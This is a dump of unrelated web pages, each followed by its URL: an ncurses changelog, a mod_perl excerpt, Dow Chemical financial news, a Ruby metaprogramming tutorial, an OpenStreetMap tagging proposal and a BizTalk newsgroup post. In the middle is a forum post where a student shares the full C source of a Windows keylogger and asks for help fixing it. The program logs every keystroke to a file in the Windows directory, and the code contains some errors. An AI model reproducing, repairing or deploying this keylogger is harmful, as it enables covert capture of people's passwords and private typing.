+ add $(LOCAL_LIBS) definition to progs/Makefile.in, needed for
  rpath on Solaris.
+ ignore wide-acs line-drawing characters that wcwidth() claims are
  not one-column.  This is a workaround for Solaris' broken locale
  support.

20061216
+ modify configure --with-gpm option to allow it to accept a parameter,
  i.e., the name of the dynamic GPM library to load via dlopen()
  (requested by Bryan Henderson).
+ add configure option --with-valgrind, changes from vile.
+ modify configure script AC_TRY_RUN and AC_TRY_LINK checks to use
  'return' in preference to 'exit()'.

20061209
+ change default for --with-develop back to "no".
+ add XTABS to tracing of TTY bits.
+ updated autoconf patch to ifdef-out the misfeature which declares
  exit() for configure tests.  This fixes a redefinition warning on
  Solaris.
+ use ${CC} rather than ${LD} in shared library rules for IRIX64,
  Solaris to help ensure that initialization sections are provided for
  extra linkage requirements, e.g., of C++ applications (prompted by
  comment by Casper Dik in newsgroup).
+ rename "$target" in CF_MAN_PAGES to make it easier to distinguish
  from the autoconf predefined symbol.  There was no conflict,
  since "$target" was used only in the generated edit_man.sh file,
  but SuSE's rpm package contains a patch.

20061202
+ update man/term.5 to reflect extended terminfo support and hashed
  database configuration.
+ updates for test/configure script.
+ adapted from SuSE rpm package:
  + remove long-obsolete workaround for broken-linker which declared
    cur_term in tic.c
  + improve error recovery in PUTC() macro when wcrtomb() does not
    return usable results for an 8-bit character.
+ patches from rpm package (SuSE):
  + use va_copy() in extra varargs manipulation for tracing version
    of printw, etc.
  + use a va_list rather than a null in _nc_freeall()'s call to
    _nc_printf_string().
+ add some see-also references in manpages to show related
  wide-character functions (suggested by Claus Fischer).

20061125
+ add a check in lib_color.c to ensure caller does not increase COLORS
  above max_colors, which is used as an array index (discussion with
  Simon Sasburg).
+ add ifdef's allowing ncurses to be built with tparm() using either
  varargs (the existing status), or using a fixed-parameter list (to
  match X/Open).

20061104
+ fix redrawing of windows other than stdscr using wredrawln() by
  touching the corresponding rows in curscr (discussion with Dan
  Gookin).
+ add test/redraw.c
+ add test/echochar.c
+ review/cleanup manpage descriptions of error-returns for form- and
  menu-libraries (prompted by FreeBSD docs/46196).

20061028
+ add AUTHORS file -TD
+ omit the -D options from output of the new config script --cflags
  option (suggested by Ralf S Engelschall).
+ make NCURSES_INLINE unconditionally defined in curses.h

20061021
+ revert change to accommodate bash 3.2, since that breaks other
  platforms, e.g., Solaris.
+ minor fixes to NEWS file to simplify scripting to obtain list of
  contributors.
+ improve some shared-library configure scripting for Linux, FreeBSD
  and NetBSD to make "--with-shlib-version" work.
+ change configure-script rules for FreeBSD shared libraries to allow
  for rpath support in versions past 3.
+ use $(DESTDIR) in makefile rules for installing/uninstalling the
  package config script (reports/patches by Christian Wiese,
  Ralf S Engelschall).
+ fix a warning in the configure script for NetBSD 2.0, working around
  spurious blanks embedded in its ${MAKEFLAGS} symbol.
+ change test/Makefile to simplify installing test programs in a
  different directory when --enable-rpath is used.

20061014
+ work around bug in bash 3.2 by adding extra quotes (Jim Gifford).
+ add/install a package config script, e.g., "ncurses5-config" or
  "ncursesw5-config", according to configuration options.

20061007
+ add several GNU Screen terminfo variations with 16- and 256-colors,
  and status line (Alain Bench).
+ change the way shared libraries (other than libtool) are installed.
  Rather than copying the build-tree's libraries, link the shared
  objects into the install directory.  This makes the --with-rpath
  option work except with $(DESTDIR) (cf: 20000930).

20060930
+ fix ifdef in c++/internal.h for QNX 6.1
+ test-compiled with (old) egcs-1.1.2, modified configure script to
  not unset the $CXX and related variables which would prevent this.
+ fix a few terminfo.src typos exposed by improvements to "-f" option.
+ improve infocmp/tic "-f" option formatting.

20060923
+ make --disable-largefile option work (report by Thomas M Ott).
+ updated html documentation.
+ add ka2, kb1, kb3, kc2 to vt220-keypad as an extension -TD
+ minor improvements to rxvt+pcfkeys -TD

20060916
+ move static data from lib_mouse.c into SCREEN struct.
+ improve ifdef's for _POSIX_VDISABLE in tset to work with Mac OS X
  (report by Michail Vidiassov).
+ modify CF_PATH_SYNTAX to ensure it uses the result from --prefix
  option (from lynx changes) -TD
+ adapt AC_PROG_EGREP check, noting that this is likely to be another
  place aggravated by POSIXLY_CORRECT.
+ modify configure check for awk to ensure that it is found (prompted
  by report by Christopher Parker).
+ update config.sub

20060909
+ add kon, kon2 and jfbterm terminfo entry (request by Till Maas) -TD
+ remove invis capability from klone+sgr, mainly used by linux entry,
  since it does not really do this -TD

20060903
+ correct logic in wadd_wch() and wecho_wch(), which did not guard
  against passing the multi-column attribute into a call on waddch(),
  e.g., using data returned by win_wch() (cf: 20041023)
  (report by Sadrul H Chowdhury).

20060902
+ fix kterm's acsc string -TD
+ fix for change to tic/infocmp in 20060819 to ensure no blank is
  embedded into a termcap description.
+ workaround for 20050806 ifdef's change to allow visbuf.c to compile
  when using --with-termlib --with-trace options.
+ improve tgetstr() by making the return value point into the user's
  buffer, if provided (patch by Miroslav Lichvar (see Redhat #202480)).
+ correct libraries needed for foldkeys (report by Stanislav Ievlev)

20060826
+ add terminfo entries for xfce terminal (xfce) and multi gnome
  terminal (mgt) -TD
+ add test/foldkeys.c

20060819
+ modify tic and infocmp to avoid writing trailing blanks on terminfo
  source output (Debian #378783).
+ modify configure script to ensure that if the C compiler is used
  rather than the loader in making shared libraries, the $(CFLAGS)
  variable is also used (Redhat #199369).
+ port hashed-db code to db2 and db3.
+ fix a bug in tgetent() from 20060625 and 20060715 changes
  (patch/analysis by Miroslav Lichvar (see Redhat #202480)).
3183 3184 20060805 3185 + updated xterm function-keys terminfo to match xterm #216 -TD 3186 + add configure --with-hashed-db option (tested only with FreeBSD 6.0, 3187 e.g., the db 1.8.5 interface). 3188 3189 20060729 3190 + modify toe to access termcap data, e.g., via cgetent() functions, 3191 or as a text file if those are not available. 3192 + use _nc_basename() in tset to improve $SHELL check for csh/sh. 3193 + modify _nc_read_entry() and _nc_read_termcap_entry() so infocmp, 3194 can access termcap data when the terminfo database is disabled. 3195 3196 20060722 3197 + widen the test for xterm kmous a little to allow for other strings 3198 than \E[M, e.g., for xterm-sco functionality in xterm. 3199 + update xterm-related terminfo entries to match xterm patch #216 -TD 3200 + update config.guess, config.sub 3201 3202 20060715 3203 + fix for install-rule in Ada95 to add terminal_interface.ads 3204 and terminal_interface.ali (anonymous posting in comp.lang.ada). 3205 + correction to manpage for getcchar() (report by William McBrine). 3206 + add test/chgat.c 3207 + modify wchgat() to mark updated cells as changed so a refresh will 3208 repaint those cells (comments by Sadrul H Chowdhury and William 3209 McBrine). 3210 + split up dependency of names.c and codes.c in ncurses/Makefile to 3211 work with parallel make (report/analysis by Joseph S Myers). 3212 + suppress a warning message (which is ignored) for systems without 3213 an ldconfig program (patch by Justin Hibbits). 3214 + modify configure script --disable-symlinks option to allow one to 3215 disable symlink() in tic even when link() does not work (report by 3216 Nigel Horne). 3217 + modify MKfallback.sh to use tic -x when constructing fallback tables 3218 to allow extended capabilities to be retrieved from a fallback entry. 3219 + improve leak-checking logic in tgetent() from 20060625 to ensure that 3220 it does not free the current screen (report by Miroslav Lichvar). 
3221 3222 20060708 3223 + add a check for _POSIX_VDISABLE in tset (NetBSD #33916). 3224 + correct _nc_free_entries() and related functions used for memory leak 3225 checking of tic. 3226 3227 20060701 3228 + revert a minor change for magic-cookie support from 20060513, which 3229 caused unexpected reset of attributes, e.g., when resizing test/view 3230 in color mode. 3231 + note in clear manpage that the program ignores command-line 3232 parameters (prompted by Debian #371855). 3233 + fixes to make lib_gen.c build properly with changes to the configure 3234 --disable-macros option and NCURSES_NOMACROS (cf: 20060527) 3235 + update/correct several terminfo entries -TD 3236 + add some notes regarding copyright to terminfo.src -TD 3237 3238 20060625 3239 + fixes to build Ada95 binding with gnat-4.1.0 3240 + modify read_termtype() so the term_names data is always allocated as 3241 part of the str_table, a better fix for a memory leak (cf: 20030809). 3242 + reduce memory leaks in repeated calls to tgetent() by remembering the 3243 last TERMINAL* value allocated to hold the corresponding data and 3244 freeing that if the tgetent() result buffer is the same as the 3245 previous call (report by "Matt" for FreeBSD gnu/98975). 3246 + modify tack to test extended capability function-key strings. 3247 + improved gnome terminfo entry (GenToo #122566). 3248 + improved xterm-256color terminfo entry (patch by Alain Bench). 3249 3250 20060617 3251 + fix two small memory leaks related to repeated tgetent() calls 3252 with TERM=screen (report by "Matt" for FreeBSD gnu/98975). 3253 + add --enable-signed-char to simplify Debian package. 3254 + reduce name-pollution in term.h by removing #define's for HAVE_xxx 3255 symbols. 3256 + correct typo in curs_terminfo.3x (Debian #369168). 3257 3258 20060603 3259 + enable the mouse in test/movewindow.c 3260 + improve a limit-check in frm_def.c (John Heasley). 3261 + minor copyright fixes. 
3262 + change configure script to produce test/Makefile from data file. 3263 3264 20060527 3265 + add a configure option --enable-wgetch-events to enable 3266 NCURSES_WGETCH_EVENTS, and correct the associated loop-logic in 3267 lib_twait.c (report by Bernd Jendrissek). 3268 + remove include/nomacros.h from build, since the ifdef for 3269 NCURSES_NOMACROS makes that obsolete. 3270 + add entrypoints for some functions which were only provided as macros 3271 to make NCURSES_NOMACROS ifdef work properly: getcurx(), getcury(), 3272 getbegx(), getbegy(), getmaxx(), getmaxy(), getparx() and getpary(), 3273 wgetbkgrnd(). 3274 + provide ifdef for NCURSES_NOMACROS which suppresses most macro 3275 definitions from curses.h, i.e., where a macro is defined to override 3276 a function to improve performance. Allowing a developer to suppress 3277 these definitions can simplify some application (discussion with 3278 Stanislav Ievlev). 3279 + improve description of memu/meml in terminfo manpage. 3280 3281 20060520 3282 + if msgr is false, reset video attributes when doing an automargin 3283 wrap to the next line. This makes the ncurses 'k' test work properly 3284 for hpterm. 3285 + correct caching of keyname(), which was using only half of its table. 3286 + minor fixes to memory-leak checking. 3287 + make SCREEN._acs_map and SCREEN._screen_acs_map pointers rather than 3288 arrays, making ACS_LEN less visible to applications (suggested by 3289 Stanislav Ievlev). 3290 + move chunk in SCREEN ifdef'd for USE_WIDEC_SUPPORT to the end, so 3291 _screen_acs_map will have the same offset in both ncurses/ncursesw, 3292 making the corresponding tinfo/tinfow libraries binary-compatible 3293 (cf: 20041016, report by Stanislav Ievlev). 3294 3295 20060513 3296 + improve debug-tracing for EmitRange(). 3297 + change default for --with-develop to "yes". 
Add NCURSES_NO_HARD_TABS 3298 and NCURSES_NO_MAGIC_COOKIE environment variables to allow runtime 3299 suppression of the related hard-tabs and xmc-glitch features. 3300 + add ncurses version number to top-level manpages, e.g., ncurses, tic, 3301 infocmp, terminfo as well as form, menu, panel. 3302 + update config.guess, config.sub 3303 + modify ncurses.c to work around a bug in NetBSD 3.0 curses 3304 (field_buffer returning null for a valid field). The 'r' test 3305 appears to not work with that configuration since the new_fieldtype() 3306 function is broken in that implementation. 3307 3308 20060506 3309 + add hpterm-color terminfo entry -TD 3310 + fixes to compile test-programs with HPUX 11.23 3311 3312 20060422 3313 + add copyright notices to files other than those that are generated, 3314 data or adapted from pdcurses (reports by William McBrine, David 3315 Taylor). 3316 + improve rendering on hpterm by not resetting attributes at the end 3317 of doupdate() if the terminal has the magic-cookie feature (report 3318 by Bernd Rieke). 3319 + add 256color variants of terminfo entries for programs which are 3320 reported to implement this feature -TD 3321 3322 20060416 3323 + fix typo in change to NewChar() macro from 20060311 changes, which 3324 broke tab-expansion (report by Frederic L W Meunier). 3325 3326 20060415 3327 + document -U option of tic and infocmp. 3328 + modify tic/infocmp to suppress smacs/rmacs when acsc is suppressed 3329 due to size limit, e.g., converting to termcap format. Also 3330 suppress them if the output format does not contain acsc and it 3331 was not VT100-like, i.e., a one-one mapping (Novell #163715). 
3332 + add configure check to ensure that SIGWINCH is defined on platforms 3333 such as OS X which exclude that when _XOPEN_SOURCE, etc., are 3334 defined (report by Nicholas Cole) 3335 3336 20060408 3337 + modify write_object() to not write coincidental extensions of an 3338 entry made due to it being referenced in a use= clause (report by 3339 Alain Bench). 3340 + another fix for infocmp -i option, which did not ensure that some 3341 escape sequences had comparable prefixes (report by Alain Bench). 3342 3343 20060401 3344 + improve discussion of init/reset in terminfo and tput manpages 3345 (report by Alain Bench). 3346 + use is3 string for a fallback of rs3 in the reset program; it was 3347 using is2 (report by Alain Bench). 3348 + correct logic for infocmp -i option, which did not account for 3349 multiple digits in a parameter (cf: 20040828) (report by Alain 3350 Bench). 3351 + move _nc_handle_sigwinch() to lib_setup.c to make --with-termlib 3352 option work after 20060114 changes (report by Arkadiusz Miskiewicz). 3353 + add copyright notices to test-programs as needed (report by William 3354 McBrine). 3355 3356 20060318 3357 + modify ncurses.c 'F' test to combine the wide-characters with color 3358 and/or video attributes. 3359 + modify test/ncurses to use CTL/Q or ESC consistently for exiting 3360 a test-screen (some commands used 'x' or 'q'). 3361 3362 20060312 3363 + fix an off-by-one in the scrolling-region change (cf_ 20060311). 3364 3365 20060311 3366 + add checks in waddchnstr() and wadd_wchnstr() to stop copying when 3367 a null character is found (report by Igor Bogomazov). 3368 + modify progs/Makefile.in to make "tput init" work properly with 3369 cygwin, i.e., do not pass a ".exe" in the reference string used 3370 in check_aliases (report by Samuel Thibault). 3371 + add some checks to ensure current position is within scrolling 3372 region before scrolling on a new line (report by Dan Gookin). 
3373 + change some NewChar() usage to static variables to work around 3374 stack garbage introduced when cchar_t is not packed (Redhat #182024). 3375 3376 20060225 3377 + workarounds to build test/movewindow with PDcurses 2.7. 3378 + fix for nsterm-16color entry (patch by Alain Bench). 3379 + correct a typo in infocmp manpage (Debian #354281). 3380 3381 20060218 3382 + add nsterm-16color entry -TD 3383 + updated mlterm terminfo entry -TD 3384 + remove 970913 feature for copying subwindows as they are moved in 3385 mvwin() (discussion with Bryan Christ). 3386 + modify test/demo_menus.c to demonstrate moving a menu (both the 3387 window and subwindow) using shifted cursor-keys. 3388 + start implementing recursive mvwin() in movewindow.c (incomplete). 3389 + add a fallback definition for GCC_PRINTFLIKE() in test.priv.h, 3390 for movewindow.c (report by William McBrine). 3391 + add help-message to test/movewindow.c 3392 3393 20060211 3394 + add test/movewindow.c, to test mvderwin(). 3395 + fix ncurses soft-key test so color changes are shown immediately 3396 rather than delayed. 3397 + modify ncurses soft-key test to hide the keys when exiting the test 3398 screen. 3399 + fixes to build test programs with PDCurses 2.7, e.g., its headers 3400 rely on autoconf symbols, and it declares stubs for nonfunctional 3401 terminfo and termcap entrypoints. 3402 3403 20060204 3404 + improved test/configure to build test/ncurses on HPUX 11 using the 3405 vendor curses. 3406 + documented ALTERNATE CONFIGURATIONS in the ncurses manpage, for the 3407 benefit of developers who do not read INSTALL. 3408 3409 20060128 3410 + correct form library Window_To_Buffer() change (cf: 20040516), which 3411 should ignore the video attributes (report by Ricardo Cantu). 3412 3413 20060121 3414 + minor fixes to xmc-glitch experimental code: 3415 + suppress line-drawing 3416 + implement max_attributes 3417 tested with xterm. 3418 + minor fixes for the database iterator. 
3419 + fix some buffer limits in c++ demo (comment by Falk Hueffner in 3420 Debian #348117). 3421 3422 20060114 3423 + add toe -a option, to show all databases. This uses new private 3424 interfaces in the ncurses library for iterating through the list of 3425 databases. 3426 + fix toe from 20000909 changes which made it not look at 3427 $HOME/.terminfo 3428 + make toe's -v option parameter optional as per manpage. 3429 + improve SIGWINCH handling by postponing its effect during newterm(), 3430 etc., when allocating screens. 3431 3432 20060111 3433 + modify wgetnstr() to return KEY_RESIZE if a sigwinch occurs. Use 3434 this in test/filter.c 3435 + fix an error in filter() modification which caused some applications 3436 to fail. 3437 3438 20060107 3439 + check if filter() was called when getting the screensize. Keep it 3440 at 1 if so (based on Redhat #174498). 3441 + add extension nofilter(). 3442 + refined the workaround for ACS mapping. 3443 + make ifdef's consistent in curses.h for the extended colors so the 3444 header file can be used for the normal curses library. The header 3445
http://ncurses.scripts.mit.edu/?p=ncurses.git;a=blob;f=NEWS;h=05ea4b7f286fa9a1ec3dd08bb9a600853064b6e8;hb=4204d0154d2ee2d272807a0023d38ed9035ea555
As you know, Perl has several magic global variables, subroutines, and literals that have the same meaning no matter what package they are called from. A handful of these variables have special meaning when running under mod_perl. Here we describe these and other global variables maintained by mod_perl.

Don't forget that Perl code has a much longer lifetime and lives among many more namespaces in the mod_perl environment than it does in a conventional CGI environment. When modifying a Perl global variable, we recommend that you always localize the variable so modifications do not trip up other Perl code running in the server.

We begin with the list of magic global variables that have special significance to mod_perl.

$0

When running under Apache::Registry or Apache::PerlRun, this variable is set to the filename field of the request_rec. When running inside a <Perl> section, the value of $0 is the path to the configuration file in which the Perl section is located, such as httpd.conf or srm.conf.

$^X

Normally, this variable holds the path to the Perl program that was executed from the shell. Under mod_perl, there is no Perl program, just the Perl library linked with Apache. Thus, this variable is set to that of the Apache binary in which Perl is currently running, such as /usr/local/apache/bin/httpd or C:\Apache\apache.exe.

$|

As the perlvar(1) manpage explains, if this variable ...
https://www.safaribooksonline.com/library/view/writing-apache-modules/156592567X/156592567X_ch09-12332.html
29 December 2008 23:53 [Source: ICIS news]

(Adds Standard and Poor's, Moody's downgrade, stock closings in paragraphs 9-13)

"Cancellation of K-Dow could compromise Dow's ability to close its pending acquisition of Rohm and Haas, a key element of Dow's strategic plan, although neither that deal nor related financing is contingent upon closing of K-Dow," said Bank of America analyst Kevin McCarthy in a research note.

On 1 December, US-based Dow Chemical finalised its K-Dow commodity chemical joint venture agreement. Dow could file an arbitration claim for up to $2.5bn for the break-up of the deal.

Without the cash from the K-Dow deal, Dow would be highly leveraged if it were to complete its acquisition of Rohm and Haas, noted McCarthy.

If Dow completed the Rohm and Haas deal on its original terms, the company would have net debt of up to $29.6bn, representing a leverage ratio of 4.5x estimated 2009 earnings before interest, tax, depreciation and amortization (EBITDA), McCarthy projected.

The merger arbitrage spread on Rohm and Haas has widened to $27.81, or 55.4%, indicating growing scepticism among investors that the deal will go through on the original terms, if at all.

The K-Dow collapse prompted Standard & Poor's (S&P) to pull down Dow's corporate credit and senior unsecured ratings from A-minus to BBB, while its long-term ratings remained on S&P's CreditWatch with "negative implications".

"This decision was unexpected given Dow's recent confidence that it would close the transaction, and is a significant development from both a strategic and financial profile standpoint," said Standard & Poor's credit analyst Kyle Loughlin.

Moody's Investor Service lowered Dow's senior unsecured ratings to Baa1 from A
http://www.icis.com/Articles/2008/12/29/9181090/K-Dow-collapse-endangers-Rohm-and-Haas-deal-BoA.html
Please note before reading this: this is a keylogger. No, it is not used for malicious purposes, as it only runs with the program prompt open and stops as soon as the program is exited. I'm just trying to show my computer teacher something, because he's an idiot who gets his lessons straight out of a textbook :confused:

I tried it up to the non-working line and the file worked fine, except it would hog the processor, and when compiled it would stop working, so there goes that solution. Anyway, what am I doing wrong on that line? I checked at least 15 times to make sure I nested everything right, but everything seems to be in check. My problem, however, is the line marked with the comment below. Dev C++ 4.9.8.0 gives me a "[WARNING] comparison".

#include <stdio.h>
#include <windows.h>
#include <Winuser.h>

cout <<"\n Your keys are now being saved to a file called Key.txt in your C:\ Windows Folder. As soon as you exit this program it wll stop logging your keys";

void keys(int key,char *file)
{
    FILE *key_file;
    key_file = fopen(file,"a+");
    if (key==8)
        fprintf(key_file,"%s","[del]");
    if (key==13)
        fprintf(key_file,"%s","\n");
    if (key==32)
        fprintf(key_file,"%s"," ");
    if (key==VK_CAPITAL)
        fprintf(key_file,"%s","[Caps]");
    if (key==VK_TAB)
        fprintf(key_file,"%s","[TAB]");
    if (key==VK_SHIFT)
        fprintf(key_file,"%s","[SHIFT]");
    if (key==VK_CONTROL)
        fprintf(key_file,"%s","[CTRL]");
    if (key==VK_PAUSE)
        fprintf(key_file,"%s","[PAUSE]");
    if (key==VK_KANA)
        fprintf(key_file,"%s","[Kana]");
    if (key==VK_ESCAPE)
        fprintf(key_file,"%s","[ESC]");
    if (key==VK_END)
        fprintf(key_file,"%s","[END]");
    if (key==VK_HOME)
        fprintf(key_file,"%s","[HOME]");
    if (key==VK_LEFT)
        fprintf(key_file,"%s","");
    if (key==VK_UP)
        fprintf(key_file,"%s","[UP]");
    if (key==VK_RIGHT)
        fprintf(key_file,"%s","");
    if (key==VK_DOWN)
        fprintf(key_file,"%s","[DOWN]");
    if (key==VK_SNAPSHOT)
        fprintf(key_file,"%s","[PRINT]");
    if (key==VK_NUMLOCK)
        fprintf(key_file,"%s","[NUM LOCK]");
    if (key==190 || key==110)
        fprintf(key_file,"%s",".");
    if (key>=96 && key<=105){
        key = key - 48;
        fprintf(key_file,"%s",&key);
    }
    if (key>=48 && key<=59)
        fprintf(key_file,"%s",&key);
    if (key!=VK_LBUTTON || key!=VK_RBUTTON){
        if (key>=65 && key<=90){
            if (GetKeyState(VK_CAPITAL))
                fprintf(key_file,"%s",&key);
            else {
                key = key + 32;
                fprintf(key_file,"%s",&key);
            }
        }
    }
    fclose(key_file);
}

int main()
{
    char i;
    char test[MAX_PATH];
    GetWindowsDirectory(test,sizeof(test));
    strcat(test,"//keys.txt");
    while(1){
        for(i=8;i<=190;i++){    // THIS IS WHERE MY COMPILER ERROR IS
            if (GetAsyncKeyState(i) == -32767)
            {
                keys (i,test);
            }
        }
    }
}
https://www.daniweb.com/programming/software-development/threads/56614/help-with-fixing-my-source-code
Ruby Metaprogramming: Part I

If you're working with Ruby, chances are by now you've heard the word "metaprogramming" thrown around quite a lot. You may have even used metaprogramming, but not fully understood the true power or usefulness of what it can do. By the end of this article, you should have a firm grasp not only of what it is, but also of what it is capable of, and how you can harness one of Ruby's "killer features" in your projects.

What is "metaprogramming"?

Metaprogramming is best explained as the programming of programming. Don't let this abstract definition scare you away, though, because Ruby makes metaprogramming as easy to understand as it is to work with. Metaprogramming can be used as a way to add, edit or modify the code of your program while it's running. Using it, you can define new methods on objects or delete existing ones, reopen or modify existing classes, catch calls to methods that don't exist, and avoid repetitious coding to keep your program DRY.

Understanding how Ruby calls methods

Before you can understand the full scope of metaprogramming, it's imperative that you grasp how Ruby finds a method when it is called. When you call a method in Ruby, it must locate that method (if it exists) somewhere within the inheritance chain.

class Person
  def say
    "hello"
  end
end

john_smith = Person.new
john_smith.say # => "hello"

When the say() method is called in the example above, Ruby first looks at the parent of the john_smith object; because this object is an instance of the Person class, and that class has a method called say(), this method is called.
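The lookup can also be watched from code. This short sketch reuses the Person class above; `ancestors` is a standard Ruby method that returns the chain Ruby will search, in the order it searches it:

```ruby
class Person
  def say
    "hello"
  end
end

# The classes Ruby asks, in order, when a method is called on a Person:
p Person.ancestors             # => [Person, Object, Kernel, BasicObject]

john_smith = Person.new
p john_smith.say               # => "hello" -- found directly on Person
p john_smith.respond_to?(:sing) # => false -- defined nowhere in the chain
```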
Things get more complicated, however, when the object is an instance of a class which has inherited from another class:

class Animal
  def eats
    "food"
  end

  def lives_in
    "the wild"
  end
end

class Pig < Animal
  def lives_in
    "farm"
  end
end

babe = Pig.new
babe.lives_in # => "farm"
babe.eats # => "food"
babe.thisdoesnotexist # => NoMethodError: undefined method `thisdoesnotexist' for #<Pig:0x16a53c8>

When we introduce inheritance into the mix, Ruby needs to consider methods defined higher in the inheritance chain. When we call babe.lives_in(), Ruby first checks the Pig class for the method lives_in(); because it exists, it's called. It's a slightly different story when we call the babe.eats() method, though. Ruby checks for that method by asking the Pig class if it can respond to eats(); in the absence of that method on Pig, it continues by asking the parent class Animal if it can respond; it can in our case, so it is called. When we call babe.thisdoesnotexist(), because the method does not exist anywhere in the chain, we get a NoMethodError exception. You can think of this as a sort of cascade: whatever method is defined lowest in the inheritance chain will be the method that ends up being called; if the method doesn't exist at all, an exception is raised.

Based on what we have discovered so far, we can summarise the way Ruby looks up each method as a pattern something like the following:

1. Ask the object's class if it can respond to the method, calling it if found.
2. Otherwise, ask each parent class up the inheritance chain in turn, calling the method on the first class that can respond.
3. If no class in the chain can respond, raise a NoMethodError exception.

Note that because every object inherits from Object (or BasicObject in Ruby 1.9) at the very top level, that class will always be the last to be asked, but only if it makes it that far up the inheritance chain without finding a method that can respond.

Introducing the Singleton class

Ruby gives you the full power of Object Oriented programming and allows you to create objects that inherit from other classes and call their methods; but what if only a single object requires an addition, alteration, or deletion?
The "singleton class" (sometimes known as the "eigenclass") is designed exactly for this, and allows you to do all that and more. A simple example is in order:

greeting = "Hello World"

def greeting.greet
  self
end

greeting.greet # => "Hello World"

Let's digest what's just happened here line by line. On the first line, we create a new variable called greeting that represents a simple String value. On the second line, we create a new method called greeting.greet and give it very simple content. Ruby allows you to choose which object to attach a method definition to by using the format some_object.method_name, which you may recognize as the same syntax for adding class methods to classes (i.e., def self.something). In this case, as we had greeting first, the method has been attached to our greeting variable. On the final line, we call the new greeting.greet method we just defined.

The greeting.greet method has access to the entire object it has been attached to; in Ruby, we always refer to that object as self. In this case, self refers to the String value we attached it to. If we had attached it to an Array, self would have returned that Array object.

As you're about to see, adding methods using some_object.method_name is not always the best way to do such tasks. That's why Ruby provides another, far more useful way of working with objects and their methods in a dynamic way. Meet the singleton class:

greeting = "i like cheese"

class << greeting
  def greet
    "hello! " + self
  end
end

greeting.greet # => "hello! i like cheese"

The syntax is very strange, but the outcome is the same as our some_object.method_name way of adding methods. This singleton class syntax allows you to add many methods at once without having to prefix all of your method names. It also allows you to add anything you would normally add during the declaration of a class, including attr_writer, attr_reader, and attr_accessor methods.

How does it work?

So how does it actually work?
The name "singleton class" might have given this away slightly, but Ruby is sneaky and adds another class into our inheritance chain. When you operate on the singleton class, Ruby needs a way to attach methods to the individual object we're adding to, something that the language does not normally allow. To get around this, it creates a secret new class, which we call the "singleton class". This class is given the methods and changes instead, and is made the parent of the object we're working on. The singleton class is also made a subclass of the previous parent of our object, so that the inheritance chain remains mostly unchanged:

some object instance > singleton class > parent class > ... > Object/BasicObject

Returning to what we know about Ruby method lookup, we previously decided that there were three simple steps that the Ruby interpreter followed when looking up a method. Singleton classes add one extra step to this lookup process:

1. Ask the object if its singleton class can respond to the method, calling it if found.
2. Otherwise, ask the object's class, then each parent class up the inheritance chain in turn, calling the method on the first that can respond.
3. If nothing in the chain can respond, raise a NoMethodError exception.

As we previously discussed, you can think of this as a cascade, and that has a very important impact on our idea of objects in Ruby: not only can objects gain methods from their inherited classes, but they can now gain individually unique methods as the program is running.

Putting metaprogramming to work with instance_eval and class_eval

Having singleton classes is all good and well, but to truly work with objects dynamically you need to be able to re-open them at runtime within other functions. Unfortunately, Ruby does not syntactically allow you to have class statements within a function. This is where instance_eval comes into the picture. The instance_eval method is defined in Ruby's standard Kernel module and allows you to add instance methods to an object just like our singleton class syntax:
foo = "bar"

foo.instance_eval do
  def hi
    "you smell"
  end
end

foo.hi # => "you smell"

The instance_eval method can take a block (in which self is set to the object you're operating on), or a string of code to be evaluated. Inside the block, you can define new methods as if you were writing a class, and these will be added to the singleton class of the object. Methods defined by instance_eval will be instance methods.

It's important to note that the scope is that of instance methods, which means you can't do things like attr_accessor as a result. If you find yourself needing this, you'll want to operate on the class of the object instead, using class_eval:

bar = "foo"

bar.class.class_eval do
  def hello
    "i can smell you from here"
  end
end

bar.hello # => "i can smell you from here"

As you can see, instance_eval and class_eval are very similar, but their scope and application differ ever so slightly. You can remember what to use in each situation by remembering that you use instance_eval to make instance methods and class_eval to make class methods.

Why do I care?

At this point you're probably thinking "that's great, but why should I care? What real world value does any of this have?" The simple answer is "yes, you should" and "a lot". In part two of this series we'll look at how to apply metaprogramming to everyday problems, and see how its elegance and power can change the way you develop solutions forever.
http://www.sitepoint.com/ruby-metaprogramming-part-i/
Proposed features/camp site pitch

Tagging of individual pitches

One might be interested in tagging individual pitches within a campground. A pitch means (in this context) the free space used to place one tent or one caravan.

This proposal builds on the earlier work in tagging individual pitches at Proposed features/Extend camp site, but changes tag names to be more consistent in the use of namespace conventions and to use tag names consistent with current practices.

Tag Conventions

To avoid confusion with the sporting use of the word pitch (see leisure=pitch), a place for pitching a tent or parking a caravan is called a "camp pitch" (camp_site=camp_pitch), and the facilities at that pitch that are dedicated to the use of the pitch occupants use a camp_pitch:*=<value> namespace tagging system.

There may be items like tables, water supply, or fire rings associated with the pitch. If the item is specifically for the use of the occupant of the pitch, use the pitch-specific namespace tags. If the item is shared by multiple pitches or by the campground as a whole, it should be tagged using a more general tag.

Tags within the camp_pitch:* namespace follow, as closely as possible, the naming used for the equivalent amenity if it were not dedicated to the pitch occupants. For example, a publicly available supply of drinking water is normally tagged amenity=drinking_water, so camp_pitch:drinking_water=yes/no is used to indicate whether or not there is an exclusive drinking water supply for that pitch.

Tagging

A camp pitch is tagged either as a point, located at the post or sign identifying the pitch, or as a way around the boundary of the pitch. The following tags are placed on the point or way:

1) Why the need for camp_site=camp_pitch? Why not: camp_pitch=ref;addr;type;parking;table;stove;surface;electric;water;drain, where if the item is listed, 'yes' is the default.

2) Grass pitches may move, to allow grass to recover from being camped on.
3) It should be clear that the part after "camp_pitch" should not just be made up. Those are OSM tags mentioned elsewhere. Brycenesbitt (talk) 23:26, 1 May 2015 (UTC)
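The tag table itself did not survive in this copy of the proposal, so purely as an illustration (the ref value and the choice of amenities below are hypothetical, drawing only on keys discussed in this proposal and its talk comments), a single pitch mapped as a node might carry:

```
camp_site=camp_pitch
camp_pitch:ref=27
camp_pitch:drinking_water=yes
camp_pitch:table=yes
camp_pitch:fire_ring=yes
```

As the convention above describes, each camp_pitch:* key mirrors the name of the equivalent stand-alone amenity tag, marking the facility as dedicated to that pitch's occupants.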
http://wiki.openstreetmap.org/wiki/Proposed_features/camp_site_pitch
Re: BT2006 Debatching from SQL Adapter

- From: "rclb" <ray.crager@xxxxxxxxxxxxxxx>
- Date: 30 Jul 2006 06:44:05 -0700

How do you have the Any node set up in the schema? In the schema editor, try setting the Namespace property of the Any node to ##any and the Process Content property to "skip".

Gregory Harris wrote:

Hi all, excuse me if this one is a little long...

I'm wondering if I'm missing something: I am using the SQL adapter for BizTalk 2006 against a SQL Server 2005 database. I have a receive location polling a table, and the generated schema has a target namespace like. Fine so far.

